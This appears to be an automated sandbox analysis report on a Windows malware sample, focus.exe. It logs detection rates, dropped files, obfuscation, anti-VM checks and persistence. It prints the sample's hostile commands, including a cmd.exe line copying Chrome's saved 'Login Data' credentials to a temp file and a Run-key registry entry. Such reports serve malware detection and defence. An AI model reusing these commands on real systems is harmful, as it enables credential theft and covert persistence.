Source: focus.exe Virustotal: Detection: 68%
Source: focus.exe Metadefender: Detection: 26%
Source: focus.exe ReversingLabs: Detection: 89%
Source: C:\Users\user\Desktop\focus.exe File read: C:\Users\user\Desktop\focus.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\focus.exe 'C:\Users\user\Desktop\focus.exe'
Source: C:\Users\user\Desktop\focus.exe Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Source: C:\Users\user\Desktop\focus.exe Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe' Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe' Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V Jump to behavior
Source: C:\Users\user\Desktop\focus.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\focus.exe File written: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\config.ini Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: focus.exe Static file information: File size 2844959 > 1048576
Source: focus.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscript.pdbGCTL source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: C:\workdir\build\Release_TS\IDMBrBtn\icu4c-57_1-src\obj\win3.pdb source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, wscript.exe, 00000018.00000002.463956730.00000000049EC000.00000004.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr
Source: Binary string: D:\winx64-packages\Release\Release\PotPlayer\obj\Vi.pdb source: player-toolkit.exe, 00000002.00000002.359142610.000000006E4D6000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.464579995.000000006E616000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp, libdisplay4-1.dll.0.dr
Source: Binary string: wntdll.pdbUGP source: player-toolkit.exe, 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: player-toolkit.exe, wscript.exe
Source: Binary string: wscript.pdb source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Unpacked PE file: 2.2.player-toolkit.exe.10000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_0001C8D0 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary, 29_2_0001C8D0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_000268DD push 00000061h; retf 2_2_000268DF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_000269D2 push eax; retf 2_2_000269D9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_000271EC push edx; iretd 2_2_000271ED
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00027A43 push esp; iretd 2_2_00027AB2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00027A65 push esp; iretd 2_2_00027AB2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00027AB9 push esp; iretd 2_2_00027AB2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00027AED push esp; iretd 2_2_00027AB2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00027D42 push edx; ret 2_2_00027D44
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002BE22 push edx; iretd 2_2_0002BE29
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002CEA5 push eax; ret 2_2_0002CEF8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002CEF2 push eax; ret 2_2_0002CEF8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002CEFB push eax; ret 2_2_0002CF62
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002CF5C push eax; ret 2_2_0002CF62
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029AD0D1 push ecx; ret 2_2_029AD0E4
Source: C:\Windows\explorer.exe Code function: 19_2_065C33E6 pushad ; ret 19_2_065C33E7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B4D0D1 push ecx; ret 24_2_04B4D0E4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E71EC push edx; iretd 24_2_003E71ED
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003EDA32 push esp; retf 24_2_003EDA34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E7A65 push esp; iretd 24_2_003E7AB2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E7A43 push esp; iretd 24_2_003E7AB2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E7AB9 push esp; iretd 24_2_003E7AB2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E7AED push esp; iretd 24_2_003E7AB2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003EDBA4 push es; ret 24_2_003EDBAA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E7D42 push edx; ret 24_2_003E7D44
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003EBE22 push edx; iretd 24_2_003EBE29
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003ECEA5 push eax; ret 24_2_003ECEF8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003ECEFB push eax; ret 24_2_003ECF62
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003ECEF2 push eax; ret 24_2_003ECEF8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003ECF5C push eax; ret 24_2_003ECF62
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 29_2_001478AC push ecx; ret 29_2_001478BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 32_2_6E52FF4F push ecx; ret 32_2_6E52FF62

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\focus.exe File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\ReadMe.txt Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run K6M8V4IX5F Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run K6M8V4IX5F Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE8
Source: C:\Users\user\Desktop\focus.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe RDTSC instruction interceptor: First address: 00000000000198E4 second address: 00000000000198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe RDTSC instruction interceptor: First address: 0000000000019B4E second address: 0000000000019B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000003D98E4 second address: 00000000003D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000003D9B4E second address: 00000000003D9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\focus.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00019A80 rdtsc 2_2_00019A80
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\focus.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -59890s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -59781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -59673s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -59563s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -59454s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -59345s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -59236s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -59126s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -59017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -58907s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -58798s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -58689s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -58579s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -58470s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -58360s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -58251s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -58142s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -58032s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -57923s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -57814s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -57704s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -57595s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -57485s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -57376s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -57266s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -57157s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -57048s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -56939s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -56829s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -56720s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -56610s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -56501s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -56392s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -56282s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -56173s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -56064s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -55954s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -55845s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -55736s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -55626s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -55517s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -55408s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -55298s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -55189s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -55079s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -54970s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -54860s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -54751s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -54642s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -54532s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -54423s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -54313s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -54204s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -54095s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -53985s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -53876s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -53767s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -53657s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -53548s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -53439s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -53329s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -53220s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -53110s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -53001s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -52892s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -52782s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -52673s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -52563s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -52454s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -52345s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -52235s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -52126s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -52016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -51907s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -51798s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -51689s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -51579s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -51470s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -51360s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -51251s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -51142s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -51037s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -50922s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -50814s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -50704s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -50595s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -50485s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -50376s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -50267s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -50157s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -50037s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -49923s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -49813s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -49704s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -49595s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -49485s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -49376s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -49267s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -49157s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -49048s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880 Thread sleep time: -48939s >= -30000s Jump to behavior
